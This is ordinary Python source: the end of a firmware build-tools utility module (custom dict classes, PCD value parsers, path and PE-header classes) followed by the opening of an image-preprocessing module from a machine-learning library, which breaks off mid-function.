self.PromptMessage = OpenMessage
Progressor._StopFlag.clear()
if Progressor._ProgressThread == None:
Progressor._ProgressThread = threading.Thread(target=self._ProgressThreadEntry)
Progressor._ProgressThread.setDaemon(False)
Progressor._ProgressThread.start()
## Stop printing progress charater
#
# @param CloseMessage The string printed after progress charaters
#
def Stop(self, CloseMessage=None):
OriginalCodaMessage = self.CodaMessage
if CloseMessage != None:
self.CodaMessage = CloseMessage
self.Abort()
self.CodaMessage = OriginalCodaMessage
## Thread entry method
def _ProgressThreadEntry(self):
sys.stdout.write(self.PromptMessage + " ")
sys.stdout.flush()
TimeUp = 0.0
while not Progressor._StopFlag.isSet():
if TimeUp <= 0.0:
sys.stdout.write(self.ProgressChar)
sys.stdout.flush()
TimeUp = self.Interval
time.sleep(self._CheckInterval)
TimeUp -= self._CheckInterval
sys.stdout.write(" " + self.CodaMessage + "\n")
sys.stdout.flush()
## Abort the progress display
@staticmethod
def Abort():
if Progressor._StopFlag != None:
Progressor._StopFlag.set()
if Progressor._ProgressThread != None:
Progressor._ProgressThread.join()
Progressor._ProgressThread = None
## A dict which can access its keys and/or values orderly
#
# The class implements a new kind of dict which its keys or values can be
# accessed in the order they are added into the dict. It guarantees the order
# by making use of an internal list to keep a copy of keys.
#
class sdict(IterableUserDict):
## Constructor
def __init__(self):
IterableUserDict.__init__(self)
self._key_list = []
## [] operator
def __setitem__(self, key, value):
if key not in self._key_list:
self._key_list.append(key)
IterableUserDict.__setitem__(self, key, value)
## del operator
def __delitem__(self, key):
self._key_list.remove(key)
IterableUserDict.__delitem__(self, key)
## used in "for k in dict" loop to ensure the correct order
def __iter__(self):
return self.iterkeys()
## len() support
def __len__(self):
return len(self._key_list)
## "in" test support
def __contains__(self, key):
return key in self._key_list
## indexof support
def index(self, key):
return self._key_list.index(key)
## insert support
def insert(self, key, newkey, newvalue, order):
index = self._key_list.index(key)
if order == 'BEFORE':
self._key_list.insert(index, newkey)
IterableUserDict.__setitem__(self, newkey, newvalue)
elif order == 'AFTER':
self._key_list.insert(index + 1, newkey)
IterableUserDict.__setitem__(self, newkey, newvalue)
## append support
def append(self, sdict):
for key in sdict:
if key not in self._key_list:
self._key_list.append(key)
IterableUserDict.__setitem__(self, key, sdict[key])
def has_key(self, key):
return key in self._key_list
## Empty the dict
def clear(self):
self._key_list = []
IterableUserDict.clear(self)
## Return a copy of keys
def keys(self):
keys = []
for key in self._key_list:
keys.append(key)
return keys
## Return a copy of values
def values(self):
values = []
for key in self._key_list:
values.append(self[key])
return values
## Return a copy of (key, value) list
def items(self):
items = []
for key in self._key_list:
items.append((key, self[key]))
return items
## Iteration support
def iteritems(self):
return iter(self.items())
## Keys interation support
def iterkeys(self):
return iter(self.keys())
## Values interation support
def itervalues(self):
return iter(self.values())
## Return value related to a key, and remove the (key, value) from the dict
def pop(self, key, *dv):
value = None
if key in self._key_list:
value = self[key]
self.__delitem__(key)
elif len(dv) != 0 :
value = kv[0]
return value
## Return (key, value) pair, and remove the (key, value) from the dict
def popitem(self):
key = self._key_list[-1]
value = self[key]
self.__delitem__(key)
return key, value
def update(self, dict=None, **kwargs):
if dict != None:
for k, v in dict.items():
self[k] = v
if len(kwargs):
for k, v in kwargs.items():
self[k] = v
## Dictionary with restricted keys
#
class rdict(dict):
## Constructor
def __init__(self, KeyList):
for Key in KeyList:
dict.__setitem__(self, Key, "")
## []= operator
def __setitem__(self, key, value):
if key not in self:
EdkLogger.error("RestrictedDict", ATTRIBUTE_SET_FAILURE, "Key [%s] is not allowed" % key,
ExtraData=", ".join(dict.keys(self)))
dict.__setitem__(self, key, value)
## =[] operator
def __getitem__(self, key):
if key not in self:
return ""
return dict.__getitem__(self, key)
## del operator
def __delitem__(self, key):
EdkLogger.error("RestrictedDict", ATTRIBUTE_ACCESS_DENIED, ExtraData="del")
## Empty the dict
def clear(self):
for Key in self:
self.__setitem__(Key, "")
## Return value related to a key, and remove the (key, value) from the dict
def pop(self, key, *dv):
EdkLogger.error("RestrictedDict", ATTRIBUTE_ACCESS_DENIED, ExtraData="pop")
## Return (key, value) pair, and remove the (key, value) from the dict
def popitem(self):
EdkLogger.error("RestrictedDict", ATTRIBUTE_ACCESS_DENIED, ExtraData="popitem")
## Dictionary using prioritized list as key
#
class tdict:
_ListType = type([])
_TupleType = type(())
_Wildcard = 'COMMON'
_ValidWildcardList = ['COMMON', 'DEFAULT', 'ALL', '*', 'PLATFORM']
def __init__(self, _Single_=False, _Level_=2):
self._Level_ = _Level_
self.data = {}
self._Single_ = _Single_
# =[] operator
def __getitem__(self, key):
KeyType = type(key)
RestKeys = None
if KeyType == self._ListType or KeyType == self._TupleType:
FirstKey = key[0]
if len(key) > 1:
RestKeys = key[1:]
elif self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_-1)]
else:
FirstKey = key
if self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_-1)]
if FirstKey == None or str(FirstKey).upper() in self._ValidWildcardList:
FirstKey = self._Wildcard
if self._Single_:
return self._GetSingleValue(FirstKey, RestKeys)
else:
return self._GetAllValues(FirstKey, RestKeys)
def _GetSingleValue(self, FirstKey, RestKeys):
Value = None
#print "%s-%s" % (FirstKey, self._Level_) ,
if self._Level_ > 1:
if FirstKey == self._Wildcard:
if FirstKey in self.data:
Value = self.data[FirstKey][RestKeys]
if Value == None:
for Key in self.data:
Value = self.data[Key][RestKeys]
if Value != None: break
else:
if FirstKey in self.data:
Value = self.data[FirstKey][RestKeys]
if Value == None and self._Wildcard in self.data:
#print "Value=None"
Value = self.data[self._Wildcard][RestKeys]
else:
if FirstKey == self._Wildcard:
if FirstKey in self.data:
Value = self.data[FirstKey]
if Value == None:
for Key in self.data:
Value = self.data[Key]
if Value != None: break
else:
if FirstKey in self.data:
Value = self.data[FirstKey]
elif self._Wildcard in self.data:
Value = self.data[self._Wildcard]
return Value
def _GetAllValues(self, FirstKey, RestKeys):
Value = []
if self._Level_ > 1:
if FirstKey == self._Wildcard:
for Key in self.data:
Value += self.data[Key][RestKeys]
else:
if FirstKey in self.data:
Value += self.data[FirstKey][RestKeys]
if self._Wildcard in self.data:
Value += self.data[self._Wildcard][RestKeys]
else:
if FirstKey == self._Wildcard:
for Key in self.data:
Value.append(self.data[Key])
else:
if FirstKey in self.data:
Value.append(self.data[FirstKey])
if self._Wildcard in self.data:
Value.append(self.data[self._Wildcard])
return Value
## []= operator
def __setitem__(self, key, value):
KeyType = type(key)
RestKeys = None
if KeyType == self._ListType or KeyType == self._TupleType:
FirstKey = key[0]
if len(key) > 1:
RestKeys = key[1:]
else:
RestKeys = [self._Wildcard for i in range(0, self._Level_-1)]
else:
FirstKey = key
if self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_-1)]
if FirstKey in self._ValidWildcardList:
FirstKey = self._Wildcard
if FirstKey not in self.data and self._Level_ > 0:
self.data[FirstKey] = tdict(self._Single_, self._Level_ - 1)
if self._Level_ > 1:
self.data[FirstKey][RestKeys] = value
else:
self.data[FirstKey] = value
def SetGreedyMode(self):
self._Single_ = False
if self._Level_ > 1:
for Key in self.data:
self.data[Key].SetGreedyMode()
def SetSingleMode(self):
self._Single_ = True
if self._Level_ > 1:
for Key in self.data:
self.data[Key].SetSingleMode()
def GetKeys(self, KeyIndex=0):
assert KeyIndex >= 0
if KeyIndex == 0:
return set(self.data.keys())
else:
keys = set()
for Key in self.data:
keys |= self.data[Key].GetKeys(KeyIndex - 1)
return keys
## Boolean chain list
#
class Blist(UserList):
def __init__(self, initlist=None):
UserList.__init__(self, initlist)
def __setitem__(self, i, item):
if item not in [True, False]:
if item == 0:
item = False
else:
item = True
self.data[i] = item
def _GetResult(self):
Value = True
for item in self.data:
Value &= item
return Value
Result = property(_GetResult)
def ParseConsoleLog(Filename):
Opr = open(os.path.normpath(Filename), 'r')
Opw = open(os.path.normpath(Filename + '.New'), 'w+')
for Line in Opr.readlines():
if Line.find('.efi') > -1:
Line = Line[Line.rfind(' ') : Line.rfind('.efi')].strip()
Opw.write('%s\n' % Line)
Opr.close()
Opw.close()
## AnalyzeDscPcd
#
# Analyze DSC PCD value, since there is no data type info in DSC
# This fuction is used to match functions (AnalyzePcdData, AnalyzeHiiPcdData, AnalyzeVpdPcdData) used for retrieving PCD value from database
# 1. Feature flag: TokenSpace.PcdCName|PcdValue
# 2. Fix and Patch:TokenSpace.PcdCName|PcdValue[|MaxSize]
# 3. Dynamic default:
# TokenSpace.PcdCName|PcdValue[|VOID*[|MaxSize]]
# TokenSpace.PcdCName|PcdValue
# 4. Dynamic VPD:
# TokenSpace.PcdCName|VpdOffset[|VpdValue]
# TokenSpace.PcdCName|VpdOffset[|MaxSize[|VpdValue]]
# 5. Dynamic HII:
# TokenSpace.PcdCName|HiiString|VaiableGuid|VariableOffset[|HiiValue]
# PCD value needs to be located in such kind of string, and the PCD value might be an expression in which
# there might have "|" operator, also in string value.
#
# @param Setting: String contain information described above with "TokenSpace.PcdCName|" stripped
# @param PcdType: PCD type: feature, fixed, dynamic default VPD HII
# @param DataType: The datum type of PCD: VOID*, UNIT, BOOL
# @retval:
# ValueList: A List contain fields described above
# IsValid: True if conforming EBNF, otherwise False
# Index: The index where PcdValue is in ValueList
#
def AnalyzeDscPcd(Setting, PcdType, DataType=''):
Setting = Setting.strip()
# There might be escaped quote in a string: \", \\\"
Data = Setting.replace('\\\\', '//').replace('\\\"', '\\\'')
# There might be '|' in string and in ( ... | ... ), replace it with '-'
NewStr = ''
InStr = False
Pair = 0
for ch in Data:
if ch == '"':
InStr = not InStr
elif ch == '(' and not InStr:
Pair += 1
elif ch == ')' and not InStr:
Pair -= 1
if (Pair > 0 or InStr) and ch == TAB_VALUE_SPLIT:
NewStr += '-'
else:
NewStr += ch
FieldList = []
StartPos = 0
while True:
Pos = NewStr.find(TAB_VALUE_SPLIT, StartPos)
if Pos < 0:
FieldList.append(Setting[StartPos:].strip())
break
FieldList.append(Setting[StartPos:Pos].strip())
StartPos = Pos + 1
IsValid = True
if PcdType in (MODEL_PCD_FIXED_AT_BUILD, MODEL_PCD_PATCHABLE_IN_MODULE, MODEL_PCD_FEATURE_FLAG):
Value = FieldList[0]
Size = ''
if len(FieldList) > 1:
Type = FieldList[1]
# Fix the PCD type when no DataType input
if Type == 'VOID*':
DataType = 'VOID*'
else:
Size = FieldList[1]
if len(FieldList) > 2:
Size = FieldList[2]
if DataType == 'VOID*':
IsValid = (len(FieldList) <= 3)
else:
IsValid = (len(FieldList) <= 1)
return [Value, '', Size], IsValid, 0
elif PcdType in (MODEL_PCD_DYNAMIC_DEFAULT, MODEL_PCD_DYNAMIC_EX_DEFAULT):
Value = FieldList[0]
Size = Type = ''
if len(FieldList) > 1:
Type = FieldList[1]
else:
Type = DataType
if len(FieldList) > 2:
Size = FieldList[2]
else:
if Type == 'VOID*':
if Value.startswith("L"):
Size = str((len(Value)- 3 + 1) * 2)
elif Value.startswith("{"):
Size = str(len(Value.split(",")))
else:
Size = str(len(Value) -2 + 1 )
if DataType == 'VOID*':
IsValid = (len(FieldList) <= 3)
else:
IsValid = (len(FieldList) <= 1)
return [Value, Type, Size], IsValid, 0
elif PcdType in (MODEL_PCD_DYNAMIC_VPD, MODEL_PCD_DYNAMIC_EX_VPD):
VpdOffset = FieldList[0]
Value = Size = ''
if not DataType == 'VOID*':
if len(FieldList) > 1:
Value = FieldList[1]
else:
if len(FieldList) > 1:
Size = FieldList[1]
if len(FieldList) > 2:
Value = FieldList[2]
if DataType == 'VOID*':
IsValid = (len(FieldList) <= 3)
else:
IsValid = (len(FieldList) <= 2)
return [VpdOffset, Size, Value], IsValid, 2
elif PcdType in (MODEL_PCD_DYNAMIC_HII, MODEL_PCD_DYNAMIC_EX_HII):
HiiString = FieldList[0]
Guid = Offset = Value = ''
if len(FieldList) > 1:
Guid = FieldList[1]
if len(FieldList) > 2:
Offset = FieldList[2]
if len(FieldList) > 3:
Value = FieldList[3]
IsValid = (3 <= len(FieldList) <= 4)
return [HiiString, Guid, Offset, Value], IsValid, 3
return [], False, 0
## AnalyzePcdData
#
# Analyze the pcd Value, Datum type and TokenNumber.
# Used to avoid split issue while the value string contain "|" character
#
# @param[in] Setting: A String contain value/datum type/token number information;
#
# @retval ValueList: A List contain value, datum type and toke number.
#
def AnalyzePcdData(Setting):
ValueList = ['', '', '']
ValueRe = re.compile(r'^\s*L?\".*\|.*\"')
PtrValue = ValueRe.findall(Setting)
ValueUpdateFlag = False
if len(PtrValue) >= 1:
Setting = re.sub(ValueRe, '', Setting)
ValueUpdateFlag = True
TokenList = Setting.split(TAB_VALUE_SPLIT)
ValueList[0:len(TokenList)] = TokenList
if ValueUpdateFlag:
ValueList[0] = PtrValue[0]
return ValueList
## AnalyzeHiiPcdData
#
# Analyze the pcd Value, variable name, variable Guid and variable offset.
# Used to avoid split issue while the value string contain "|" character
#
# @param[in] Setting: A String contain VariableName, VariableGuid, VariableOffset, DefaultValue information;
#
# @retval ValueList: A List contaian VariableName, VariableGuid, VariableOffset, DefaultValue.
#
def AnalyzeHiiPcdData(Setting):
ValueList = ['', '', '', '']
TokenList = GetSplitValueList(Setting)
ValueList[0:len(TokenList)] = TokenList
return ValueList
## AnalyzeVpdPcdData
#
# Analyze the vpd pcd VpdOffset, MaxDatumSize and InitialValue.
# Used to avoid split issue while the value string contain "|" character
#
# @param[in] Setting: A String contain VpdOffset/MaxDatumSize/InitialValue information;
#
# @retval ValueList: A List contain VpdOffset, MaxDatumSize and InitialValue.
#
def AnalyzeVpdPcdData(Setting):
ValueList = ['', '', '']
ValueRe = re.compile(r'\s*L?\".*\|.*\"\s*$')
PtrValue = ValueRe.findall(Setting)
ValueUpdateFlag = False
if len(PtrValue) >= 1:
Setting = re.sub(ValueRe, '', Setting)
ValueUpdateFlag = True
TokenList = Setting.split(TAB_VALUE_SPLIT)
ValueList[0:len(TokenList)] = TokenList
if ValueUpdateFlag:
ValueList[2] = PtrValue[0]
return ValueList
## check format of PCD value against its the datum type
#
# For PCD value setting
#
def CheckPcdDatum(Type, Value):
if Type == "VOID*":
ValueRe = re.compile(r'\s*L?\".*\"\s*$')
if not (((Value.startswith('L"') or Value.startswith('"')) and Value.endswith('"'))
or (Value.startswith('{') and Value.endswith('}'))
):
return False, "Invalid value [%s] of type [%s]; must be in the form of {...} for array"\
", or \"...\" for string, or L\"...\" for unicode string" % (Value, Type)
elif ValueRe.match(Value):
# Check the chars in UnicodeString or CString is printable
if Value.startswith("L"):
Value = Value[2:-1]
else:
Value = Value[1:-1]
Printset = set(string.printable)
Printset.remove(TAB_PRINTCHAR_VT)
Printset.add(TAB_PRINTCHAR_BS)
Printset.add(TAB_PRINTCHAR_NUL)
if not set(Value).issubset(Printset):
PrintList = list(Printset)
PrintList.sort()
return False, "Invalid PCD string value of type [%s]; must be printable chars %s." % (Type, PrintList)
elif Type == 'BOOLEAN':
if Value not in ['TRUE', 'True', 'true', '0x1', '0x01', '1', 'FALSE', 'False', 'false', '0x0', '0x00', '0']:
return False, "Invalid value [%s] of type [%s]; must be one of TRUE, True, true, 0x1, 0x01, 1"\
", FALSE, False, false, 0x0, 0x00, 0" % (Value, Type)
elif Type in [TAB_UINT8, TAB_UINT16, TAB_UINT32, TAB_UINT64]:
try:
Value = long(Value, 0)
except:
return False, "Invalid value [%s] of type [%s];"\
" must be a hexadecimal, decimal or octal in C language format." % (Value, Type)
else:
return False, "Invalid type [%s]; must be one of VOID*, BOOLEAN, UINT8, UINT16, UINT32, UINT64." % (Type)
return True, ""
## Split command line option string to list
#
# subprocess.Popen needs the args to be a sequence. Otherwise there's problem
# in non-windows platform to launch command
#
def SplitOption(OptionString):
OptionList = []
LastChar = " "
OptionStart = 0
QuotationMark = ""
for Index in range(0, len(OptionString)):
CurrentChar = OptionString[Index]
if CurrentChar in ['"', "'"]:
if QuotationMark == CurrentChar:
QuotationMark = ""
elif QuotationMark == "":
QuotationMark = CurrentChar
continue
elif QuotationMark:
continue
if CurrentChar in ["/", "-"] and LastChar in [" ", "\t", "\r", "\n"]:
if Index > OptionStart:
OptionList.append(OptionString[OptionStart:Index-1])
OptionStart = Index
LastChar = CurrentChar
OptionList.append(OptionString[OptionStart:])
return OptionList
def CommonPath(PathList):
P1 = min(PathList).split(os.path.sep)
P2 = max(PathList).split(os.path.sep)
for Index in xrange(min(len(P1), len(P2))):
if P1[Index] != P2[Index]:
return os.path.sep.join(P1[:Index])
return os.path.sep.join(P1)
#
# Convert string to C format array
#
def ConvertStringToByteArray(Value):
Value = Value.strip()
if not Value:
return None
if Value[0] == '{':
if not Value.endswith('}'):
return None
Value = Value.replace(' ', '').replace('{', '').replace('}', '')
ValFields = Value.split(',')
try:
for Index in range(len(ValFields)):
ValFields[Index] = str(int(ValFields[Index], 0))
except ValueError:
return None
Value = '{' + ','.join(ValFields) + '}'
return Value
Unicode = False
if Value.startswith('L"'):
if not Value.endswith('"'):
return None
Value = Value[1:]
Unicode = True
elif not Value.startswith('"') or not Value.endswith('"'):
return None
Value = eval(Value) # translate escape character
NewValue = '{'
for Index in range(0,len(Value)):
if Unicode:
NewValue = NewValue + str(ord(Value[Index]) % 0x10000) + ','
else:
NewValue = NewValue + str(ord(Value[Index]) % 0x100) + ','
Value = NewValue + '0}'
return Value
class PathClass(object):
def __init__(self, File='', Root='', AlterRoot='', Type='', IsBinary=False,
Arch='COMMON', ToolChainFamily='', Target='', TagName='', ToolCode=''):
self.Arch = Arch
self.File = str(File)
if os.path.isabs(self.File):
self.Root = ''
self.AlterRoot = ''
else:
self.Root = str(Root)
self.AlterRoot = str(AlterRoot)
# Remove any '.' and '..' in path
if self.Root:
self.Path = os.path.normpath(os.path.join(self.Root, self.File))
self.Root = os.path.normpath(CommonPath([self.Root, self.Path]))
# eliminate the side-effect of 'C:'
if self.Root[-1] == ':':
self.Root += os.path.sep
# file path should not start with path separator
if self.Root[-1] == os.path.sep:
self.File = self.Path[len(self.Root):]
else:
self.File = self.Path[len(self.Root)+1:]
else:
self.Path = os.path.normpath(self.File)
self.SubDir, self.Name = os.path.split(self.File)
self.BaseName, self.Ext = os.path.splitext(self.Name)
if self.Root:
if self.SubDir:
self.Dir = os.path.join(self.Root, self.SubDir)
else:
self.Dir = self.Root
else:
self.Dir = self.SubDir
if IsBinary:
self.Type = Type
else:
self.Type = self.Ext.lower()
self.IsBinary = IsBinary
self.Target = Target
self.TagName = TagName
self.ToolCode = ToolCode
self.ToolChainFamily = ToolChainFamily
self._Key = None
## Convert the object of this class to a string
#
# Convert member Path of the class to a string
#
# @retval string Formatted String
#
def __str__(self):
return self.Path
## Override __eq__ function
#
# Check whether PathClass are the same
#
# @retval False The two PathClass are different
# @retval True The two PathClass are the same
#
def __eq__(self, Other):
if type(Other) == type(self):
return self.Path == Other.Path
else:
return self.Path == str(Other)
## Override __cmp__ function
#
# Customize the comparsion operation of two PathClass
#
# @retval 0 The two PathClass are different
# @retval -1 The first PathClass is less than the second PathClass
# @retval 1 The first PathClass is Bigger than the second PathClass
def __cmp__(self, Other):
if type(Other) == type(self):
OtherKey = Other.Path
else:
OtherKey = str(Other)
SelfKey = self.Path
if SelfKey == OtherKey:
return 0
elif SelfKey > OtherKey:
return 1
else:
return -1
## Override __hash__ function
#
# Use Path as key in hash table
#
# @retval string Key for hash table
#
def __hash__(self):
return hash(self.Path)
def _GetFileKey(self):
if self._Key == None:
self._Key = self.Path.upper() # + self.ToolChainFamily + self.TagName + self.ToolCode + self.Target
return self._Key
def _GetTimeStamp(self):
return os.stat(self.Path)[8]
def Validate(self, Type='', CaseSensitive=True):
if GlobalData.gCaseInsensitive:
CaseSensitive = False
if Type and Type.lower() != self.Type:
return FILE_TYPE_MISMATCH, '%s (expect %s but got %s)' % (self.File, Type, self.Type)
RealFile, RealRoot = RealPath2(self.File, self.Root, self.AlterRoot)
if not RealRoot and not RealFile:
RealFile = self.File
if self.AlterRoot:
RealFile = os.path.join(self.AlterRoot, self.File)
elif self.Root:
RealFile = os.path.join(self.Root, self.File)
return FILE_NOT_FOUND, os.path.join(self.AlterRoot, RealFile)
ErrorCode = 0
ErrorInfo = ''
if RealRoot != self.Root or RealFile != self.File:
if CaseSensitive and (RealFile != self.File or (RealRoot != self.Root and RealRoot != self.AlterRoot)):
ErrorCode = FILE_CASE_MISMATCH
ErrorInfo = self.File + '\n\t' + RealFile + " [in file system]"
self.SubDir, self.Name = os.path.split(RealFile)
self.BaseName, self.Ext = os.path.splitext(self.Name)
if self.SubDir:
self.Dir = os.path.join(RealRoot, self.SubDir)
else:
self.Dir = RealRoot
self.File = RealFile
self.Root = RealRoot
self.Path = os.path.join(RealRoot, RealFile)
return ErrorCode, ErrorInfo
Key = property(_GetFileKey)
TimeStamp = property(_GetTimeStamp)
## Parse PE image to get the required PE informaion.
#
class PeImageClass():
## Constructor
#
# @param File FilePath of PeImage
#
def __init__(self, PeFile):
self.FileName = PeFile
self.IsValid = False
self.Size = 0
self.EntryPoint = 0
self.SectionAlignment = 0
self.SectionHeaderList = []
self.ErrorInfo = ''
try:
PeObject = open(PeFile, 'rb')
except:
self.ErrorInfo = self.FileName + ' can not be found\n'
return
# Read DOS header
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x3E)
ByteList = ByteArray.tolist()
# DOS signature should be 'MZ'
if self._ByteListToStr (ByteList[0x0:0x2]) != 'MZ':
self.ErrorInfo = self.FileName + ' has no valid DOS signature MZ'
return
# Read 4 byte PE Signature
PeOffset = self._ByteListToInt(ByteList[0x3C:0x3E])
PeObject.seek(PeOffset)
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 4)
# PE signature should be 'PE\0\0'
if ByteArray.tostring() != 'PE\0\0':
self.ErrorInfo = self.FileName + ' has no valid PE signature PE00'
return
# Read PE file header
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x14)
ByteList = ByteArray.tolist()
SecNumber = self._ByteListToInt(ByteList[0x2:0x4])
if SecNumber == 0:
self.ErrorInfo = self.FileName + ' has no section header'
return
# Read PE optional header
OptionalHeaderSize = self._ByteListToInt(ByteArray[0x10:0x12])
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, OptionalHeaderSize)
ByteList = ByteArray.tolist()
self.EntryPoint = self._ByteListToInt(ByteList[0x10:0x14])
self.SectionAlignment = self._ByteListToInt(ByteList[0x20:0x24])
self.Size = self._ByteListToInt(ByteList[0x38:0x3C])
# Read each Section Header
for Index in range(SecNumber):
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x28)
ByteList = ByteArray.tolist()
SecName = self._ByteListToStr(ByteList[0:8])
SecVirtualSize = self._ByteListToInt(ByteList[8:12])
SecRawAddress = self._ByteListToInt(ByteList[20:24])
SecVirtualAddress = self._ByteListToInt(ByteList[12:16])
self.SectionHeaderList.append((SecName, SecVirtualAddress, SecRawAddress, SecVirtualSize))
self.IsValid = True
PeObject.close()
def _ByteListToStr(self, ByteList):
String = ''
for index in range(len(ByteList)):
if ByteList[index] == 0:
break
String += chr(ByteList[index])
return String
def _ByteListToInt(self, ByteList):
Value = 0
for index in range(len(ByteList) - 1, -1, -1):
Value = (Value << 8) | int(ByteList[index])
return Value
class SkuClass():
DEFAULT = 0
SINGLE = 1
MULTIPLE =2
def __init__(self,SkuIdentifier='', SkuIds={}):
self.AvailableSkuIds = sdict()
self.SkuIdSet = []
if SkuIdentifier == '' or SkuIdentifier is None:
self.SkuIdSet = ['DEFAULT']
elif SkuIdentifier == 'ALL':
self.SkuIdSet = SkuIds.keys()
else:
r = SkuIdentifier.split('|')
self.SkuIdSet=[r[k].strip() for k in range(len(r))]
if len(self.SkuIdSet) == 2 and 'DEFAULT' in self.SkuIdSet and SkuIdentifier != 'ALL':
self.SkuIdSet.remove('DEFAULT')
for each in self.SkuIdSet:
if each in SkuIds:
self.AvailableSkuIds[each] = SkuIds[each]
else:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData="SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
% (each, " ".join(SkuIds.keys())))
def __SkuUsageType(self):
if len(self.SkuIdSet) == 1:
if self.SkuIdSet[0] == 'DEFAULT':
return SkuClass.DEFAULT
else:
return SkuClass.SINGLE
else:
return SkuClass.MULTIPLE
def __GetAvailableSkuIds(self):
return self.AvailableSkuIds
def __GetSystemSkuID(self):
if self.__SkuUsageType() == SkuClass.SINGLE:
return self.SkuIdSet[0]
else:
return 'DEFAULT'
SystemSkuId = property(__GetSystemSkuID)
AvailableSkuIdSet = property(__GetAvailableSkuIds)
SkuUsageType = property(__SkuUsageType)
##
#
# This acts like the main() function for the script, unless it is 'import'ed into another
# script.
#
if __name__ == '__main__':
pass
|
prepro.py
|
#! /usr/bin/python
# -*- coding: utf-8 -*-
import copy
import threading
import time
import numpy as np
import tensorlayer as tl
import scipy
import scipy.ndimage as ndi
from scipy import linalg
from scipy.ndimage.filters import gaussian_filter
from scipy.ndimage.interpolation import map_coordinates
import skimage
from skimage import exposure
from skimage import transform
from skimage.morphology import disk
from skimage.morphology import erosion as _erosion
from skimage.morphology import binary_dilation as _binary_dilation
from skimage.morphology import binary_erosion as _binary_erosion
from six.moves import range
import PIL
# linalg https://docs.scipy.org/doc/scipy/reference/linalg.html
# ndimage https://docs.scipy.org/doc/scipy/reference/ndimage.html
__all__ = [
'threading_data',
'rotation',
'rotation_multi',
'crop',
'crop_multi',
'flip_axis',
'flip_axis_multi',
'shift',
'shift_multi',
'shear',
'shear_multi',
'shear2',
'shear_multi2',
'swirl',
'swirl_multi',
'elastic_transform',
'elastic_transform_multi',
'zoom',
'zoom_multi',
'brightness',
'brightness_multi',
'illumination',
'rgb_to_hsv',
'hsv_to_rgb',
'adjust_hue',
'imresize',
'pixel_value_scale',
'samplewise_norm',
'featurewise_norm',
'get_zca_whitening_principal_components_img',
'zca_whitening',
'channel_shift',
'channel_shift_multi',
'drop',
'transform_matrix_offset_center',
'apply_transform',
'projective_transform_by_points',
'array_to_img',
'find_contours',
'pt2map',
'binary_dilation',
'dilation',
'binary_erosion',
'erosion',
'obj_box_coords_rescale',
'obj_box_coord_rescale',
'obj_box_coord_scale_to_pixelunit',
'obj_box_coord_centroid_to_upleft_butright',
'obj_box_coord_upleft_butright_to_centroid',
'obj_box_coord_centroid_to_upleft',
'obj_box_coord_upleft_to_centroid',
'parse_darknet_ann_str_to_list',
'parse_darknet_ann_list_to_cls_box',
'obj_box_left_right_flip',
'obj_box_imresize',
'obj_box_crop',
'obj_box_shift',
'obj_box_zoom',
'pad_sequences',
'remove_pad_sequences',
'process_sequences',
'sequences_add_start_id',
'sequences_add_end_id',
'sequences_add_end_id_after_pad',
'sequences_get_mask',
]
def threading_data(data=None, fn=None, thread_count=None, **kwargs):
"""Process a batch of data by given function by threading.
Usually be used for data augmentation.
Parameters
-----------
data : numpy.array or others
The data to be processed.
thread_count : int
The number of threads to use.
fn : function
The function for data processing.
more args : the args for `fn`
Ssee Examples below.
Examples
--------
Process images.
>>> images, _, _, _ = tl.files.load_cifar10_dataset(shape=(-1, 32, 32, 3))
>>> images = tl.prepro.threading_data(images[0:32], tl.prepro.zoom, zoom_range=[0.5, 1])
Customized image preprocessing function.
>>> def distort_img(x):
>>> x = tl.prepro.flip_axis(x, axis=0, is_random=True)
>>> x = tl.prepro.flip_axis(x, axis=1, is_random=True)
>>> x = tl.prepro.crop(x, 100, 100, is_random=True)
>>> return x
>>> images = tl.prepro.threading_data(images, distort_img)
Process images and masks together (Usually be used for image segmentation).
>>> X, Y --> [batch_size, row, col, 1]
>>> data = tl.prepro.threading_data([_ for _ in zip(X, Y)], tl.prepro.zoom_multi, zoom_range=[0.5, 1], is_random=True)
data --> [batch_size, 2, row, col, 1]
>>> X_, Y_ = data.transpose((1,0,2,3,4))
X_, Y_ --> [batch_size, row, col, 1]
>>> tl.vis.save_image(X_, 'images.png')
>>> tl.vis.save_image(Y_, 'masks.png')
Process images and masks together by using ``thread_count``.
>>> X, Y --> [batch_size, row, col, 1]
>>> data = tl.prepro.threading_data(X, tl.prepro.zoom_multi, 8, zoom_range=[0.5, 1], is_random=True)
data --> [batch_size, 2, row, col, 1]
>>> X_, Y_ = data.transpose((1,0,2,3,4))
X_, Y_ --> [batch_size, row, col, 1]
>>> tl.vis.save_image(X_, 'after.png')
>>> tl.vis.save_image(Y_, 'before.png')
Customized function for processing images and masks together.
>>> def distort_img(data):
>>> x, y = data
>>> x, y = tl.prepro.flip_axis_multi([x, y], axis=0, is_random=True)
>>> x, y = tl.prepro.flip_axis_multi([x, y], axis=1, is_random=True)
>>> x, y = tl.prepro.crop_multi([x, y], 100, 100, is_random=True)
>>> return x, y
>>> X, Y --> [batch_size, row, col, channel]
>>> data = tl.prepro.threading_data([_ for _ in zip(X, Y)], distort_img)
>>> X_, Y_ = data.transpose((1,0,2,3,4))
Returns
-------
list or numpyarray
The processed results.
References
----------
- `python queue <https://pymotw.com/2/Queue/index.html#module-Queue>`__
- `run with limited queue <http://effbot.org/librarybook/queue.htm>`__
"""
def apply_fn(results, i, data, kwargs):
results[i] = fn(data, **kwargs)
if thread_count is None:
results = [None] * len(data)
threads = []
# for i in range(len(data)):
# t = threading.Thread(name='threading_and_return', target=apply_fn, args=(results, i, data[i], kwargs))
for i, d in enumerate(data):
t = threading.Thread(name='threading_and_return', target=apply_fn, args=(results, i, d, kwargs))
t.start()
threads.append(t)
else:
divs = np.linspace(0, len(data), thread_count + 1)
divs = np.round(divs).astype(int)
results = [None] * thread_count
threads = []
for i in range(thread_count):
t = threading.Thread(
name='threading_and_return', target=apply_fn, args=(results, i, data[divs[i]:divs[i + 1]], kwargs)
)
t.start()
threads.append(t)
for t in threads:
t.join()
if thread_count is None:
try:
return np.asarray(results)
except Exception:
return results
else:
